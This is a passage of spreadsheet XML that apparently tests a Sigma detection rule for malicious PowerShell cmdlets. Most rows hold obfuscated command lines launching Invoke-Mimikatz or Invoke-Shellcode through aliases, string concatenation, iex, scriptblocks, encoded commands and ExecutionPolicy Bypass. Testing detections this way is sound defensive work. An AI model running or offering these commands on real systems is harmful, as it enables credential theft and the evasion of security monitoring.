      <c r="K693" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="694" ht="15.75" customHeight="1" s="42">
      <c r="A694" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B694" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C694" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D694" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E694" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I694" s="44" t="n"/>
      <c r="J694" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K694" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="695" ht="15.75" customHeight="1" s="42">
      <c r="A695" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B695" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C695" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D695" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E695" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I695" s="44" t="n"/>
      <c r="J695" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K695" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="696" ht="15.75" customHeight="1" s="42">
      <c r="A696" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B696" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C696" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D696" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E696" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I696" s="44" t="n"/>
      <c r="J696" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K696" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="697" ht="15.75" customHeight="1" s="42">
      <c r="A697" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B697" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C697" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D697" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E697" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I697" s="43" t="n"/>
      <c r="J697" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K697" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="698" ht="15.75" customHeight="1" s="42">
      <c r="A698" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B698" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C698" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D698" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E698" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I698" s="44" t="n"/>
      <c r="J698" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K698" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="699" ht="15.75" customHeight="1" s="42">
      <c r="A699" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B699" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C699" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D699" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E699" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I699" s="43" t="n"/>
      <c r="J699" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K699" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="700" ht="15.75" customHeight="1" s="42">
      <c r="A700" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B700" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C700" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D700" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E700" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I700" s="43" t="n"/>
      <c r="J700" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K700" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="701" ht="15.75" customHeight="1" s="42">
      <c r="A701" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B701" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C701" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D701" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E701" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I701" s="43" t="n"/>
      <c r="J701" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K701" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="702" ht="15.75" customHeight="1" s="42">
      <c r="A702" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B702" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C702" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D702" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E702" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I702" s="44" t="n"/>
      <c r="J702" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K702" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="703" ht="15.75" customHeight="1" s="42">
      <c r="A703" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B703" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C703" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D703" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E703" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I703" s="43" t="n"/>
      <c r="J703" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K703" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="704" ht="15.75" customHeight="1" s="42">
      <c r="A704" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B704" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C704" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D704" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E704" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I704" s="43" t="n"/>
      <c r="J704" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K704" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="705" ht="15.75" customHeight="1" s="42">
      <c r="A705" s="43" t="n"/>
      <c r="B705" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C705" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D705" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E705" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I705" s="44" t="n"/>
      <c r="J705" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K705" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="706" ht="15.75" customHeight="1" s="42">
      <c r="A706" s="43" t="n"/>
      <c r="B706" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C706" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D706" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E706" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I706" s="44" t="n"/>
      <c r="J706" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K706" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="707" ht="15.75" customHeight="1" s="42">
      <c r="A707" s="43" t="n"/>
      <c r="B707" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C707" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D707" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E707" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I707" s="44" t="n"/>
      <c r="J707" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K707" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="708" ht="15.75" customHeight="1" s="42">
      <c r="A708" s="43" t="n"/>
      <c r="B708" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C708" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D708" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E708" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I708" s="44" t="n"/>
      <c r="J708" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K708" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="709" ht="15.75" customHeight="1" s="42">
      <c r="A709" s="43" t="n"/>
      <c r="B709" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C709" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D709" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E709" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I709" s="43" t="n"/>
      <c r="J709" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K709" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="710" ht="15.75" customHeight="1" s="42">
      <c r="A710" s="43" t="n"/>
      <c r="B710" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C710" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D710" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E710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710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I710" s="43" t="n"/>
      <c r="J710" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K710" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="711" ht="15.75" customHeight="1" s="42">
      <c r="A711" s="43" t="n"/>
      <c r="B711" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C711" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D711" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E711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711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I711" s="43" t="n"/>
      <c r="J711" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K711" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="15.75" customHeight="1" s="42">
      <c r="A712" s="43" t="n"/>
      <c r="B712" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C712" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D712" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E712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712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I712" s="44" t="n"/>
      <c r="J712" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K712" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="713" ht="15.75" customHeight="1" s="42">
      <c r="A713" s="43" t="n"/>
      <c r="B713" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C713" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D713" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E713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713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I713" s="43" t="n"/>
      <c r="J713" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K713" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="714" ht="15.75" customHeight="1" s="42">
      <c r="A714" s="43" t="n"/>
      <c r="B714" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C714" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D714" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E714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714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I714" s="43" t="n"/>
      <c r="J714" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K714" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="715" ht="15.75" customHeight="1" s="42">
      <c r="A715" s="43" t="n"/>
      <c r="B715" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C715" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D715" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E715" s="4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715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I715" s="43" t="n"/>
      <c r="J715" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K715" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="716" ht="15.75" customHeight="1" s="42">
      <c r="A716" s="43" t="n"/>
      <c r="B716" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C716" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D716" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E716" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I716" s="44" t="n"/>
      <c r="J716" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K716" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="717" ht="15.75" customHeight="1" s="42">
      <c r="A717" s="43" t="n"/>
      <c r="B717" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C717" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D717" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E717" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I717" s="44" t="n"/>
      <c r="J717" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K717" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="718" ht="15.75" customHeight="1" s="42">
      <c r="A718" s="43" t="n"/>
      <c r="B718" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C718" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D718" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E718" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I718" s="44" t="n"/>
      <c r="J718" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K718" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="719" ht="15.75" customHeight="1" s="42">
      <c r="A719" s="43" t="n"/>
      <c r="B719" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C719" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D719" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E719" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I719" s="44" t="n"/>
      <c r="J719" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K719" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="720" ht="15.75" customHeight="1" s="42">
      <c r="A720" s="43" t="n"/>
      <c r="B720" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C720" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D720" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E720" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I720" s="44" t="n"/>
      <c r="J720" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K720" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="721" ht="15.75" customHeight="1" s="42">
      <c r="A721" s="43" t="n"/>
      <c r="B721" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C721" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D721" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E721" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I721" s="44" t="n"/>
      <c r="J721" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K721" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="722" ht="15.75" customHeight="1" s="42">
      <c r="A722" s="43" t="n"/>
      <c r="B722" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C722" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D722" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E722" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I722" s="44" t="n"/>
      <c r="J722" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K722" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="723" ht="15.75" customHeight="1" s="42">
      <c r="A723" s="43" t="n"/>
      <c r="B723" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C723" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D723" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E723" s="44" t="inlineStr">
        <is>
